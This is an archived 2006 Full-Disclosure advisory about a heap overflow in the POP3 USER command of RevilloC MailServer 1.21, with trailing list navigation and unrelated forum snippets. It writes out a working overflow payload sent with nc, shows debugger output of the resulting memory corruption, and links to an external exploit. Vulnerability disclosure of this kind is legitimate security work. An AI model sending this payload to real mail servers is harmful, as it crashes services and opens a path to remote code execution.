[Full-disclosure] RevilloC mail server USER command heap overflow

From: <securma@xxxxxxxx>
Date: Tue, 7 Mar 2006 17:38:36 +0100

1-title:
Revilloc mail server "USER" command heap overflow

Product:
Revilloc MailServer and Proxy v 1.21 (http://www.revilloC.com)
The mail server is a central point for emails coming in and going out from home or office
The service will work with any standard email client that supports POP3 and SMTP.

2-Vulnerability Description:
sending a large buffer after USER commands
C:\>nc 127.0.0.1 110
+OK RevilloC POP3 Ready
USER "A" x4081 + "\xff"x4 + "\xdd"x4 + "\x0d\x0a"
causes access violation when reading [dddddddd].
ntdll!wcsncat+0x387:
7C92B3FB 8B0B MOV ECX,DWORD PTR DS:[EBX]--->EBX pointe to "\xdd"x4
ECX dddddddd
EAX FFFFFFFF

3-Status:
14/01/2006 Vendor contacted,No response

4-solution:
no patch no solution...use another mail server

5-credit:
securma massine from MorX Security Research Team

6-PoC/Exploit at:
http://www.morx.org/rev.txt

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] dikline.com official message.
Next by Date: [Full-disclosure] Re: PHP-based CMS mass-exploitation
Previous by thread: [Full-disclosure] dikline.com official message.
Next by thread: [Full-disclosure] PHP-based CMS mass-exploitation
Index(es):
- Date
- Thread

Relevant Pages

Re: emails time stamp
... trying to understand the email's time stamps. ... determine the time stamps on those emails i received? ... time zone or in the time zone of europe time zone? ... for example, for your email to your list, which then went to my mail server: ...
(freebsd-questions)
Re: strange SMTP traffic from Korea
... run any kind of mail server, unless it is so secure you're willing to ... execute attachments from emails, well, then even a bullet-proof mail ... As much as I dislike it, I just filter all traffic from Asia, and ... Sponge's Secure Solutions ...
(comp.security.misc)
Re: Email stuck in Outbox
... About 3 days ago I had a couple of emails stuck in the outbox. ... Note that it wasn't my ISPs mail server that was down - it was another ... From the recipients listed in your To, Cc, and Bcc *fields*, your e-mail client then compiles a list of RCPT-TO commands that it sends to the mail host. ...
(microsoft.public.outlook)
Re: Help
... >> I can send and receive emails using Outlook Express ... > All you can do is check the documentation of your SMTP server if you ... but the issue is the same no matter what mail server: ... Microsoft Windows MVP - Windows Server - Directory Services Security Is Like An Onion, ...
(microsoft.public.windows.server.dns)
RE: Exchange SMTP relay w/ISA
... Generally speaking, if you want to send the emails to the internet, the ... mail server, if the domain name of your SBS server is not matched the PTR ... using the smarthost to send the internet email. ... smarthost to your Small business SMTP connectors. ...
(microsoft.public.windows.server.sbs)